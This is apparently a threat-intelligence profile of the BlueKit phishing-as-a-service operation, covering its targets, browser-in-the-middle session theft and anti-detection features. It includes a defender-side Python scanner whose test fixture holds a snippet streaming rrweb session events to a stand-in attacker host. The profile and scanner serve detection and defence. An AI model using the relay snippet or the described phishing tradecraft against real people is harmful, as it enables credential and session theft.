BlueKit
BlueKit is an actively operated commercial phishing-as-a-service (PhaaS) platform used for credential harvesting, session hijacking, and account takeover. Reporting describes it as a scalable cybercriminal ecosystem with structured subscription tiers, reseller support, centralized dashboards, automated phishing deployment, anti-detection tooling, bulk smishing, Telegram notifications, and integrations including CapSolver, NanoGPT, and Octo Browser. CloudSEK assessed that its use of .su infrastructure, Jabber communications, and OPSEC-oriented tooling may suggest links to CIS-aligned cybercrime ecosystems.
BlueKit targets financial institutions, cloud providers, cryptocurrency platforms, major consumer and e-commerce services, and developer platforms globally. Reported targets and templates include Microsoft, Google, Amazon, Apple, GitHub, Outlook, Hotmail, Gmail, Yahoo, ProtonMail, iCloud, Ledger, Trezor, banking institutions, and cryptocurrency wallets. Varonis reported that BlueKit offered 40 phishing templates at the time of its report, while CloudSEK later identified 87 phishing kits in its catalog. Some kits include post-compromise automation such as password changes, backup-code generation, passkey enrollment, and victim lockout; hardware-wallet lures reportedly simulate firmware updates to steal 24-word recovery seed phrases.
Technically, BlueKit has evolved from adversary-in-the-middle techniques to browser-in-the-middle (BitM) attacks. Netcraft reported that BlueKit uses the legitimate rrweb JavaScript library to stream a victim-facing browser session over WebSocket, allowing the attacker-controlled browser to load the legitimate login page while relaying victim interaction in real time. This enables authentication to complete in the attacker-controlled browser and yields valid session tokens for unrestricted account access. Netcraft also reported nearly 70 new BlueKit hostnames identified over a one-week period.
CloudSEK separately reported that BlueKit migrated to a peer-to-peer phishing page rendering model intended to conceal backend infrastructure from browser developer tools and conventional network analysis, increasing resilience against IOC-based detection and attribution.
BlueKit includes extensive anti-analysis, anti-detection, and victim-filtering features. Reported capabilities include randomized CSS filters to hinder screenshot-based detection, frequently changing obfuscated JavaScript bundles, custom CAPTCHA pages impersonating Cloudflare or target brands, browser fingerprinting checks, WebRTC-based IP mismatch detection for proxy/VPN identification, phishing cloaking, anti-bot filtering, Safe Browsing monitoring, and Cloudflare phishing-check bypassing. Netcraft also reported a live monitoring system that updates every five seconds, allowing operators to watch victims during deceptive login sessions and track actions after login.
Operationally, BlueKit has been described as resembling a SaaS offering, with product versioning, changelogs, support channels, subscription tiers, reseller programs, and automation tooling. Reported communications and infrastructure elements include Telegram, Jabber/XMPP, Session Protocol, PGP encryption, Tor infrastructure, and cryptocurrency-only payments.
Known aliases directly supported by the content: bluekit.
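A defender-side triage check for the browser-in-the-middle mechanics and anti-detection features described above, written as an added example; this is not BlueKit code and not any vendor's detection rule. It scans a captured landing page for the indicators the reporting names: a reference to the rrweb session-streaming library, a WebSocket opened to a host other than the page's own origin, use of RTCPeerConnection (the primitive behind WebRTC IP-mismatch checks), and several distinct hue-rotate values in inline CSS (a crude proxy for randomized filters). The regexes, weights, threshold, hostnames and the two sample pages are all constructed for the example and are assumptions, not values taken from BlueKit kits.

```python
"""Heuristic scorer for browser-in-the-middle (BitM) phishing page indicators.

Added example for triage of captured phishing landing pages. The indicators
mirror the capabilities attributed to BlueKit in public reporting; the
patterns, weights and threshold below are assumptions chosen for illustration.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# rrweb identifiers (library name, record/replay entry points, player bundle).
RRWEB_RE = re.compile(r"\brrweb(?:Record|Replay|-player)?\b", re.I)
# WebSocket constructor with a literal ws:// or wss:// URL.
WS_RE = re.compile(r"new\s+WebSocket\(\s*['\"](wss?://[^'\"]+)['\"]", re.I)
# WebRTC peer connection, used by fingerprinting / IP-mismatch checks.
RTC_RE = re.compile(r"\bRTCPeerConnection\b")
# CSS filter rules containing hue-rotate(); capture the angle in degrees.
FILTER_RE = re.compile(r"filter\s*:\s*[^;}]*hue-rotate\(\s*(-?\d+(?:\.\d+)?)deg\)", re.I)
# External script sources, so an rrweb bundle loaded by URL is caught too.
SCRIPT_SRC_RE = re.compile(r"<script[^>]+src=['\"]([^'\"]+)['\"]", re.I)


@dataclass
class ScanResult:
    page_host: str
    findings: list = field(default_factory=list)
    score: int = 0

    def add(self, weight: int, message: str) -> None:
        self.findings.append(message)
        self.score += weight


def scan_page(url: str, html: str) -> ScanResult:
    """Score one captured page. Higher score = more BitM-like."""
    host = urlparse(url).hostname or ""
    result = ScanResult(page_host=host)

    srcs = SCRIPT_SRC_RE.findall(html)
    if RRWEB_RE.search(html) or any("rrweb" in s.lower() for s in srcs):
        result.add(3, "rrweb session-recording library referenced")

    for ws_url in WS_RE.findall(html):
        ws_host = urlparse(ws_url).hostname or ""
        # A relay to a different host is the BitM tell; same-origin sockets are common.
        if ws_host and ws_host != host:
            result.add(3, f"WebSocket to off-origin host {ws_host}")

    if RTC_RE.search(html):
        result.add(1, "RTCPeerConnection used (possible WebRTC IP-mismatch check)")

    angles = set(FILTER_RE.findall(html))
    if len(angles) >= 2:
        result.add(1, f"{len(angles)} distinct hue-rotate values (possible randomized CSS filter)")

    return result


def verdict(result: ScanResult, threshold: int = 4) -> str:
    """Turn a score into a triage label; threshold is an assumed tuning value."""
    return "suspect-bitm" if result.score >= threshold else "no-bitm-indicators"


# Constructed sample pages (placeholder hostnames under the reserved .test TLD).
BENIGN_PAGE = """<html><head><style>.logo{filter:hue-rotate(0deg)}</style></head>
<body><form action="/login" method="post"><input name="user"><input name="pass" type="password"></form>
<script>const live = new WebSocket("wss://login.example-brand.test/status");</script>
</body></html>"""

SUSPECT_PAGE = """<html><head>
<style>.a{filter:hue-rotate(13deg)} .b{filter:blur(2px) hue-rotate(247deg)}</style>
<script src="/static/rrweb.min.js"></script></head>
<body><div id="remote-view"></div>
<script>
const pc = new RTCPeerConnection({iceServers: []});
const relay = new WebSocket("wss://relay.example-attacker.test/session");
rrweb.record({emit(ev) { relay.send(JSON.stringify(ev)); }});
</script></body></html>"""


if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("suspect", SUSPECT_PAGE)):
        r = scan_page("https://login.example-brand.test/", page)
        print(name, r.score, verdict(r), r.findings)
```

Treat the output as a triage signal rather than a verdict: legitimate session-replay analytics also ship rrweb, and same-origin WebSockets are routine, which is why the off-origin relay carries the weight and the threshold is deliberately above any single weak indicator.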
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Software & Services
- Financial Services
Tradecraft
17 distinct techniques observed across reporting, grouped by tactic.
Recent activity
2 sources tracked across advisories, community write-ups, and news.
Phishing-as-a-service operation that provides AI-assisted phishing email generation, branded credential-harvesting templates, and browser-in-the-middle capability to steal credentials and session tokens for account takeover.
Commercial phishing-as-a-service operation providing large-scale credential harvesting, adversary-in-the-middle phishing, session hijacking, account takeover, smishing, and automated post-compromise workflows against financial institutions, cloud providers, cryptocurrency platforms, e-commerce services, and enterprise accounts globally.